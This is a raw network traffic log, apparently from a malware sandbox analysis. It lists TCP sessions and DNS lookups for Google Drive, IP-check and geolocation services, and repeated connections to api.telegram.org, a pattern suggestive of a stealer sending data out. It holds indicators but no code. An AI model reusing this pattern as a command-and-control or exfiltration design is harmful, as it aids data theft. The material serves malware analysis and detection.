                                                                                                          Jan 10, 2025 21:17:03.871563911 CET44349843104.21.48.1192.168.2.8
                                                                                                          Jan 10, 2025 21:17:03.871665955 CET49843443192.168.2.8104.21.48.1
                                                                                                          Jan 10, 2025 21:17:03.911474943 CET49843443192.168.2.8104.21.48.1
                                                                                                          Jan 10, 2025 21:17:09.659775972 CET4982780192.168.2.8193.122.6.168
                                                                                                          Jan 10, 2025 21:17:09.664526939 CET8049827193.122.6.168192.168.2.8
                                                                                                          Jan 10, 2025 21:17:09.867818117 CET8049827193.122.6.168192.168.2.8
                                                                                                          Jan 10, 2025 21:17:09.879024982 CET49877443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:09.879086971 CET44349877149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:09.879163027 CET49877443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:09.879570007 CET49877443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:09.879595995 CET44349877149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:09.914055109 CET4982780192.168.2.8193.122.6.168
                                                                                                          Jan 10, 2025 21:17:10.489929914 CET44349877149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:10.490060091 CET49877443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:10.491813898 CET49877443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:10.491825104 CET44349877149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:10.492077112 CET44349877149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:10.493598938 CET49877443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:10.539330959 CET44349877149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:10.539407969 CET49877443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:10.539414883 CET44349877149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:10.874133110 CET44349877149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:10.874284029 CET44349877149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:10.874334097 CET49877443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:10.874742031 CET49877443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:11.026407957 CET4982780192.168.2.8193.122.6.168
                                                                                                          Jan 10, 2025 21:17:11.031339884 CET8049827193.122.6.168192.168.2.8
                                                                                                          Jan 10, 2025 21:17:11.031404972 CET4982780192.168.2.8193.122.6.168
                                                                                                          Jan 10, 2025 21:17:11.035022020 CET4988880192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:11.039782047 CET8049888132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:11.039850950 CET4988880192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:11.039938927 CET4988880192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:11.044766903 CET8049888132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:11.735805988 CET8049888132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:11.737334967 CET49893443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:11.737369061 CET44349893149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:11.737472057 CET49893443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:11.738094091 CET49893443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:11.738104105 CET44349893149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:11.789066076 CET4988880192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:12.345186949 CET44349893149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:12.346955061 CET49893443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:12.346962929 CET44349893149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:12.347090006 CET49893443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:12.347096920 CET44349893149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:12.691149950 CET44349893149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:12.691257000 CET44349893149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:12.691306114 CET49893443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:12.691751957 CET49893443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:12.696393013 CET4990080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:12.701168060 CET8049900132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:12.701235056 CET4990080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:12.701349020 CET4990080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:12.706135035 CET8049900132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:13.391932011 CET8049900132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:13.393532991 CET49906443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:13.393577099 CET44349906149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:13.393703938 CET49906443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:13.393994093 CET49906443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:13.394006968 CET44349906149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:13.445578098 CET4990080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:13.998153925 CET44349906149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:13.999794960 CET49906443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:13.999824047 CET44349906149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:13.999964952 CET49906443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:13.999972105 CET44349906149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:14.331029892 CET44349906149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:14.331111908 CET44349906149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:14.331285954 CET49906443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:14.331540108 CET49906443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:14.335021019 CET4990080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:14.337014914 CET4991280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:14.340006113 CET8049900132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:14.340056896 CET4990080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:14.344660044 CET8049912132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:14.344854116 CET4991280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:14.344854116 CET4991280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:14.349706888 CET8049912132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:15.017756939 CET8049912132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:15.018946886 CET49918443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:15.018995047 CET44349918149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:15.019051075 CET49918443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:15.019397020 CET49918443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:15.019408941 CET44349918149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:15.070283890 CET4991280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:15.632827044 CET44349918149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:15.637290001 CET49918443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:15.637322903 CET44349918149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:15.637531042 CET49918443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:15.637537003 CET44349918149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:15.992254972 CET44349918149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:15.992331982 CET44349918149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:15.992491961 CET49918443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:15.992779016 CET49918443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:15.996154070 CET4991280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:15.997173071 CET4992480192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:16.001518965 CET8049912132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:16.001579046 CET4991280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:16.001976013 CET8049924132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:16.002155066 CET4992480192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:16.002155066 CET4992480192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:16.006915092 CET8049924132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:16.674288034 CET8049924132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:16.675755024 CET49930443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:16.675793886 CET44349930149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:16.675879955 CET49930443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:16.676110029 CET49930443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:16.676115036 CET44349930149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:16.726644039 CET4992480192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:17.308132887 CET44349930149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:17.310715914 CET49930443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:17.310744047 CET44349930149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:17.310920954 CET49930443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:17.310929060 CET44349930149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:17.899512053 CET44349930149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:17.899596930 CET44349930149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:17.899791956 CET49930443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:17.900105000 CET49930443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:17.903361082 CET4992480192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:17.904858112 CET4994080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:17.908399105 CET8049924132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:17.908564091 CET4992480192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:17.909686089 CET8049940132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:17.909779072 CET4994080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:17.910092115 CET4994080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:17.915368080 CET8049940132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:18.588387012 CET8049940132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:18.589771986 CET49946443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:18.589833021 CET44349946149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:18.589956999 CET49946443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:18.590229034 CET49946443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:18.590244055 CET44349946149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:18.632844925 CET4994080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:19.195462942 CET44349946149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:19.197206974 CET49946443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:19.197237015 CET44349946149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:19.197319984 CET49946443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:19.197325945 CET44349946149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:19.567267895 CET44349946149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:19.567364931 CET44349946149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:19.567435026 CET49946443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:19.567892075 CET49946443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:19.571346998 CET4994080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:19.572527885 CET4995280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:19.576380014 CET8049940132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:19.576484919 CET4994080192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:19.577315092 CET8049952132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:19.577382088 CET4995280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:19.577498913 CET4995280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:19.582282066 CET8049952132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:20.276863098 CET8049952132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:20.278089046 CET49958443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:20.278132915 CET44349958149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:20.278461933 CET49958443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:20.278461933 CET49958443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:20.278495073 CET44349958149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:20.320322037 CET4995280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:20.885703087 CET44349958149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:20.887455940 CET49958443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:20.887490034 CET44349958149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:20.887561083 CET49958443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:20.887569904 CET44349958149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:21.272578955 CET44349958149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:21.272667885 CET44349958149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:21.272725105 CET49958443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:21.275115967 CET49958443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:21.283982038 CET4995280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:21.284676075 CET4996580192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:21.289160013 CET8049952132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:21.289264917 CET4995280192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:21.289501905 CET8049965132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:21.289570093 CET4996580192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:21.290628910 CET4996580192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:21.295420885 CET8049965132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:21.974267960 CET8049965132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:21.976036072 CET49971443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:21.976072073 CET44349971149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:21.976208925 CET49971443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:21.976670980 CET49971443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:21.976680040 CET44349971149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:22.023519039 CET4996580192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:22.600461006 CET44349971149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:22.602535009 CET49971443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:22.602561951 CET44349971149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:22.602921963 CET49971443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:22.602931023 CET44349971149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:22.988543034 CET44349971149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:22.988639116 CET44349971149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:22.988832951 CET49971443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:22.989125013 CET49971443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:22.992547989 CET4996580192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:22.993930101 CET4997880192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:22.999783039 CET8049965132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:23.000683069 CET8049978132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:23.000744104 CET4996580192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:23.000874043 CET4997880192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:23.001033068 CET4997880192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:23.005812883 CET8049978132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:23.690236092 CET8049978132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:23.691567898 CET49983443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:23.691610098 CET44349983149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:23.691768885 CET49983443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:23.691956043 CET49983443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:23.691971064 CET44349983149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:23.742393017 CET4997880192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:24.333141088 CET44349983149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:24.335350990 CET49983443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:24.335370064 CET44349983149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:24.335587025 CET49983443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:24.335592985 CET44349983149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:24.707673073 CET44349983149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:24.707766056 CET44349983149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:24.707842112 CET49983443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:24.708256960 CET49983443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:24.713783026 CET4997880192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:24.714988947 CET4999180192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:24.718877077 CET8049978132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:24.718945980 CET4997880192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:24.719775915 CET8049991132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:24.719865084 CET4999180192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:24.719990015 CET4999180192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:24.724740028 CET8049991132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:25.408899069 CET8049991132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:25.410368919 CET49996443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:25.410409927 CET44349996149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:25.411183119 CET49996443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:25.411545992 CET49996443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:25.411557913 CET44349996149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:25.460953951 CET4999180192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:26.016653061 CET44349996149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:26.018695116 CET49996443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:26.018713951 CET44349996149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:26.018759012 CET49996443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:26.018768072 CET44349996149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:26.409950018 CET44349996149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:26.410028934 CET44349996149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:26.410136938 CET49996443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:26.410659075 CET49996443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:26.414319038 CET4999180192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:26.415517092 CET4999780192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:26.419265032 CET8049991132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:26.420293093 CET8049997132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:26.420357943 CET4999180192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:26.420496941 CET4999780192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:26.420572996 CET4999780192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:26.425340891 CET8049997132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:27.122813940 CET8049997132.226.247.73192.168.2.8
                                                                                                          Jan 10, 2025 21:17:27.164094925 CET4999780192.168.2.8132.226.247.73
                                                                                                          Jan 10, 2025 21:17:29.999021053 CET49998443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:29.999069929 CET44349998149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:29.999135017 CET49998443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:29.999459028 CET49998443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:29.999475002 CET44349998149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:30.623050928 CET44349998149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:30.627098083 CET49998443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:30.627120972 CET44349998149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:30.627274036 CET49998443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:17:30.627280951 CET44349998149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:30.991274118 CET44349998149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:30.991601944 CET44349998149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:17:30.991650105 CET49998443192.168.2.8149.154.167.220
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 10, 2025 21:16:55.757563114 CET5777053192.168.2.81.1.1.1
                                                                                                          Jan 10, 2025 21:16:55.764081955 CET53577701.1.1.1192.168.2.8
                                                                                                          Jan 10, 2025 21:16:56.840797901 CET5729053192.168.2.81.1.1.1
                                                                                                          Jan 10, 2025 21:16:56.848531008 CET53572901.1.1.1192.168.2.8
                                                                                                          Jan 10, 2025 21:17:00.844769955 CET5685053192.168.2.81.1.1.1
                                                                                                          Jan 10, 2025 21:17:00.852308989 CET53568501.1.1.1192.168.2.8
                                                                                                          Jan 10, 2025 21:17:03.220773935 CET5406253192.168.2.81.1.1.1
                                                                                                          Jan 10, 2025 21:17:03.228076935 CET53540621.1.1.1192.168.2.8
                                                                                                          Jan 10, 2025 21:17:09.871552944 CET5257053192.168.2.81.1.1.1
                                                                                                          Jan 10, 2025 21:17:09.878420115 CET53525701.1.1.1192.168.2.8
                                                                                                          Jan 10, 2025 21:17:11.026942015 CET6474853192.168.2.81.1.1.1
                                                                                                          Jan 10, 2025 21:17:11.033934116 CET53647481.1.1.1192.168.2.8
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 10, 2025 21:16:55.757563114 CET192.168.2.81.1.1.10x5c3dStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:16:56.840797901 CET192.168.2.81.1.1.10x41b9Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:00.844769955 CET192.168.2.81.1.1.10x122eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:03.220773935 CET192.168.2.81.1.1.10x76d2Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:09.871552944 CET192.168.2.81.1.1.10x422eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:11.026942015 CET192.168.2.81.1.1.10xeeaeStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 10, 2025 21:16:55.764081955 CET1.1.1.1192.168.2.80x5c3dNo error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:16:56.848531008 CET1.1.1.1192.168.2.80x41b9No error (0)drive.usercontent.google.com142.250.184.193A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:00.852308989 CET1.1.1.1192.168.2.80x122eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:00.852308989 CET1.1.1.1192.168.2.80x122eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:00.852308989 CET1.1.1.1192.168.2.80x122eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:00.852308989 CET1.1.1.1192.168.2.80x122eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:00.852308989 CET1.1.1.1192.168.2.80x122eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:00.852308989 CET1.1.1.1192.168.2.80x122eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:03.228076935 CET1.1.1.1192.168.2.80x76d2No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:03.228076935 CET1.1.1.1192.168.2.80x76d2No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:03.228076935 CET1.1.1.1192.168.2.80x76d2No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:03.228076935 CET1.1.1.1192.168.2.80x76d2No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:03.228076935 CET1.1.1.1192.168.2.80x76d2No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:03.228076935 CET1.1.1.1192.168.2.80x76d2No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:03.228076935 CET1.1.1.1192.168.2.80x76d2No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:09.878420115 CET1.1.1.1192.168.2.80x422eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:11.033934116 CET1.1.1.1192.168.2.80xeeaeNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:11.033934116 CET1.1.1.1192.168.2.80xeeaeNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
